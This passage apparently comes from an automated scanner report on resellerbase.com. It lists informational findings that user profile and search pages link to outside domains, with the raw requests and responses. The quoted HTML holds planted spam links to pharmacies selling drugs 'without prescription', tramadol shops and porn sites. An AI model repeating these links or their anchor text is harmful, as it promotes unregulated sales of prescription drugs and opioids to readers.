<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.323. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=darfyh

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.customerpharmacy.com/
http://www.drugsforyourhealth.com/
http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=1
http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=10
http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=11
http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=174
http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=5
http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=69
http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=7
http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=74
http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=76
http://www.freebonusrx.com/
http://www.healthcare-opportunity.com/
http://www.narcoticrx.com/
http://www.pharmacysalesonline.com/
http://www.prescriptionconsult.com/
http://www.rxalternativehealth.com/
http://www.sleepiness-pharmacy.com/
http://www.xlmedrx.com/

Request

GET /user_detail.php?u=darfyh HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:01:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.drugsforyourhealth.com/">http://www.drugsforyourhealth.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.customerpharmacy.com">Customer Pharmacy</a> | <a href="http://www.freebonusrx.com">Free Bonus Rx</a> | <a href="http://www.healthcare-opportunity.com">Healthcare Opportunity</a> | <a href="http://www.prescriptionconsult.com"> Prescription Consult</a> | <a href="http://www.rxalternativehealth.com">Rx Alternative Health </a> | <a href="http://www.NARCOTICRX.COM">Narcotic Rx </a> | <a href="http://www.SLEEPINESS-PHARMACY.COM">Sleepiness Pharmacy </a> | <a href="http://www.xlmedrx.com/">Xl Med Rx</a> | <a href="http://www.pharmacysalesonline.com"> Pharmacy Sales Online</a>| <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=1">Buy Anti Depressants</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=10">Get Antibiotics</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=69">Order Asthma Products</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=5">Blood Presure</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=7">Diabetes Pills</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=76">Formigran, Maxalt, Migraeflux, Pirazetam</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=174">Adekin For Parkinson</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=11">Sleep & Insomnia - Novanox, Planum</a> | <a href="http://www.drugsforyourhealth.com/cart.php?action=view_cat&id=74">Cholesterol - Ezetrol, Simvastatin, Sortis, Zocor</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.324. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=natural

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.buytramadolcod.com/
http://www.buytramadoltablets.com/
http://www.cheaptramadolbuy.com/
http://www.drugcompare.org/tramadol-price-and-alternatives/
http://www.norxtramadol.com/
http://www.odertramadolonline.com/
http://www.onlinetramadolprescription.com/
http://www.onlinetramadolrx.com/
http://www.pillsideeffects.com/category/analgesics-painkillers/
http://www.rxmedicare.org/tag/pain/
http://www.sideeffectsof.me/tramadol/
http://www.tramadol-rx.com/
http://www.tramadol-rx.com/tramadol.php
http://www.tramadolcheapbuy.com/
http://www.tramadoldiscounts.com/
http://www.tramadolhclbuy.com/
http://www.tramadolhydrochlorideonline.com/
http://www.tramadolmedicationonline.com/
http://www.tramadolpharmacist.com/
http://www.tramadolprice.org/
http://www.tramadolsideeffects.com/
http://www.tramadolsupply.com/
http://www.tramadoltramodol.com/

Request

GET /user_detail.php?u=natural HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:07:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 13984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.tramadol-rx.com/">http://www.tramadol-rx.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.tramadoltramodol.com/">Tramadol Tramdol</a> <a href="http://www.tramadolhclbuy.com/">Tramadol HCL Buy</a> <a href="http://www.tramadolhydrochlorideonline.com/">Tramadol Hydrochloride Online</a> <a href="http://www.buytramadolcod.com/">Buy Tramadol Cod</a> <a href="http://www.tramadoldiscounts.com/">Tramadol Discounts</a> <a href="http://www.buytramadoltablets.com/">Buy Tramadol Tablets</a> <a href="http://www.tramadolprice.org/">Tramadol Price</a> <a href="http://www.odertramadolonline.com/">Order Tramadol Online</a> <a href="http://www.onlinetramadolrx.com/">Online Tramadol Rx</a> <a href="http://www.norxtramadol.com/">No Rx Tramadol</a> <a href="http://www.tramadolcheapbuy.com/">Tramadol Cheap Buy</a> <a href="http://www.tramadolmedicationonline.com/">Tramadol Medication Online</a> <a href="http://www.onlinetramadolprescription.com/">Online Tramadol Prescription</a> <a href="http://www.cheaptramadolbuy.com/">Cheap Tramadol Buy </a> <a href="http://www.tramadolpharmacist.com/">Tramadol Pharmacist </a> <a href="http://www.tramadolsupply.com/">Tramadol Supply</a> <a href="http://www.tramadolsideeffects.com/">Tramadol Side Effects</a> <a href="http://www.drugcompare.org/tramadol-price-and-alternatives/">Tramadol Drug Compare</a> <a href="http://www.sideeffectsof.me/tramadol/"> Tramadol </a> <a href="http://www.rxmedicare.org/tag/pain/">Rx Medicare on Pain </a> <a href="http://www.tramadol-rx.com/tramadol.php">Tramadol </a> <a href="http://www.pillsideeffects.com/category/analgesics-painkillers/">Pills Side Effects </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.325. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=cabanos

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.bodydating.com/
http://www.dateoncam.com/
http://www.iabu.com/
http://www.idateclub.com/
http://www.modelsromania.com/
http://www.the-sex-directory.com/
http://www.videoaskout.com/
http://www.videohotdate.com/
http://www.videopornz.com/
http://www.xxxclipsxxx.com/

Request

GET /user_detail.php?u=cabanos HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:00:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.the-sex-directory.com/">http://www.the-sex-directory.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.videopornz.com/">Video Pornz</a> | <a href="http://www.xxxclipsxxx.com/">Xxx Clips</a> | <a href="http://www.bodydating.com/">Body Dating</a> | <a href="http://www.dateoncam.com/"> Date On Cam</a> | <a href="http://www.iabu.com/">Iabu</a> | <a href="http://www.idateclub.com/"> I Date Club </a>|<a href="http://www.videoaskout.com/"> Video Ask Out</a> | <a href="http://www.videohotdate.com/"> Video Hot Date </a> | <a href="http://www.modelsromania.com/"> Models Romania </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.326. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=sarcos

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.searchforglory.com/
http://www.searchforglory.com/quizz_questions.php?t=bank
http://www.searchforglory.com/quizz_questions.php?t=business
http://www.searchforglory.com/quizz_questions.php?t=buy
http://www.searchforglory.com/quizz_questions.php?t=card
http://www.searchforglory.com/quizz_questions.php?t=credit
http://www.searchforglory.com/quizz_questions.php?t=dating
http://www.searchforglory.com/quizz_questions.php?t=education
http://www.searchforglory.com/quizz_questions.php?t=financial
http://www.searchforglory.com/quizz_questions.php?t=funny
http://www.searchforglory.com/quizz_questions.php?t=games
http://www.searchforglory.com/quizz_questions.php?t=health
http://www.searchforglory.com/quizz_questions.php?t=loan
http://www.searchforglory.com/quizz_questions.php?t=money
http://www.searchforglory.com/quizz_questions.php?t=movies
http://www.searchforglory.com/quizz_questions.php?t=music
http://www.searchforglory.com/quizz_questions.php?t=order

Request

GET /user_detail.php?u=sarcos HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.searchforglory.com/">http://www.searchforglory.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.searchforglory.com/quizz_questions.php?t=dating">Dating</a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=health">Health</a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=games"> Games</a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=money">Money </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=music"> Music </a>|<a href="http://www.searchforglory.com/quizz_questions.php?t=funny"> Funny </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=movies"> Movies </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=order"> Order</a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=financial"> Financial </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=credit"> Credit </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=card"> Card </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=education"> Education </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=loan"> Loan </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=buy"> Buy </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=bank"> Bank </a> | <a href="http://www.searchforglory.com/quizz_questions.php?t=business"> Business </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.327. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=1staltor

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.easy-rx-meds.net/
http://www.easy-rx-meds.net/Aralen.html
http://www.easy-rx-meds.net/Atenolol.html
http://www.easy-rx-meds.net/Carbidopa__Levodopa.html
http://www.easy-rx-meds.net/Carbimazole.html
http://www.easy-rx-meds.net/Co-trimoxazole.html
http://www.easy-rx-meds.net/Colospa.html
http://www.easy-rx-meds.net/Epivir.html
http://www.easy-rx-meds.net/Flavoxate_Hcl.html
http://www.easy-rx-meds.net/Lamictal.html
http://www.easy-rx-meds.net/Mebeverine.html
http://www.easy-rx-meds.net/Ofloxacin.html
http://www.easy-rx-meds.net/Quinine.html
http://www.easy-rx-meds.net/Stugil.html
http://www.easy-rx-meds.net/Ticlopidine_Hydrochloride.html
http://www.easy-rx-meds.net/Tizanidine_Ibuprofen.html

Request

GET /user_detail.php?u=1staltor HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.easy-rx-meds.net">http://www.easy-rx-meds.net</a>
...[SNIP]...
<td width="130">
<a href="http://www.easy-rx-meds.net">online pharmacy without prescription</a>
<a href="http://www.easy-rx-meds.net/Stugil.html">Order Stugil

</a> <a href="http://www.easy-rx-meds.net/Ticlopidine_Hydrochloride.html">Buy Ticlopidine Hydrochloride

</a> <a href="http://www.easy-rx-meds.net/Tizanidine_Ibuprofen.html">Buy Tizanidine/Ibuprofen

</a> <a href="http://www.easy-rx-meds.net/Colospa.html">Buy Colospa
online
</a> <a href="http://www.easy-rx-meds.net/Quinine.html">Buy Quinine

</a> <a href="http://www.easy-rx-meds.net/Mebeverine.html">Buy Mebeverine

</a> <a href="http://www.easy-rx-meds.net/Carbidopa__Levodopa.html">Order Carbidopa, Levodopa
without prescription</a> <a href="http://www.easy-rx-meds.net/Ofloxacin.html">Order Ofloxacin
online
</a> <a href="http://www.easy-rx-meds.net/Atenolol.html">Order Atenolol
online
</a> <a href="http://www.easy-rx-meds.net/Co-trimoxazole.html">Buy Co-trimoxazole

</a> <a href="http://www.easy-rx-meds.net/Lamictal.html">Buy Lamictal
without prescription
</a> <a href="http://www.easy-rx-meds.net/Carbimazole.html">Buy Carbimazole

</a> <a href="http://www.easy-rx-meds.net/Epivir.html">Order Epivir
online
</a> <a href="http://www.easy-rx-meds.net/Aralen.html">Order Aralen
online
</a> <a href="http://www.easy-rx-meds.net/Flavoxate_Hcl.html">Order Flavoxate Hcl

</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.328. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=reedyweb

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.reedy-web.com/

Request

GET /user_detail.php?u=reedyweb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.reedy-web.com">http://www.reedy-web.com</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.329. http://www.resellerbase.com/user_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_search.php?pg_which=2&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.drugsforyourhealth.com/
http://www.the-sex-directory.com/
http://www.trustedstore.info/

Request

GET /user_search.php?pg_which=2&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:58:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 28025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.trustedstore.info/">http://www.trustedstore.info/</a>
...[SNIP]...
<td><a href="http://www.the-sex-directory.com/">http://www.the-sex-directory.com/</a>
...[SNIP]...
<td><a href="http://www.drugsforyourhealth.com/">http://www.drugsforyourhealth.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.330. http://www.resellerbase.com/user_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_search.php?pflag=search&ltr=S

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.searchforglory.com/
http://www.somawatsonbrand.com/

Request

GET /user_search.php?pflag=search&ltr=S HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 18815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.searchforglory.com/">http://www.searchforglory.com/</a>
...[SNIP]...
<td><a href="http://www.somawatsonbrand.com/">http://www.somawatsonbrand.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.331. http://www.resellerbase.com/user_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_search.php?pflag=search&ltr=U

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.buying-rx.com/

Request

GET /user_search.php?pflag=search&ltr=U HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:58:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.buying-rx.com/">http://www.buying-rx.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.332. http://www.resellerbase.com/user_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_search.php?pflag=search&ltr=R

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.reedy-web.com/
http://www.rxassistent.com/

Request

GET /user_search.php?pflag=search&ltr=R HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 17326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.rxassistent.com/">http://www.rxassistent.com/</a>
...[SNIP]...
<td><a href="http://www.reedy-web.com">http://www.reedy-web.com</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.333. http://www.resellerbase.com/user_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_search.php?pflag=search&ltr=I

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.fioricet-rx.com/

Request

GET /user_search.php?pflag=search&ltr=I HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 16150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.fioricet-rx.com/">http://www.fioricet-rx.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.334. http://www.resellerbase.com/user_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_search.php?pflag=search&ltr=D

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.drugsforyourhealth.com/

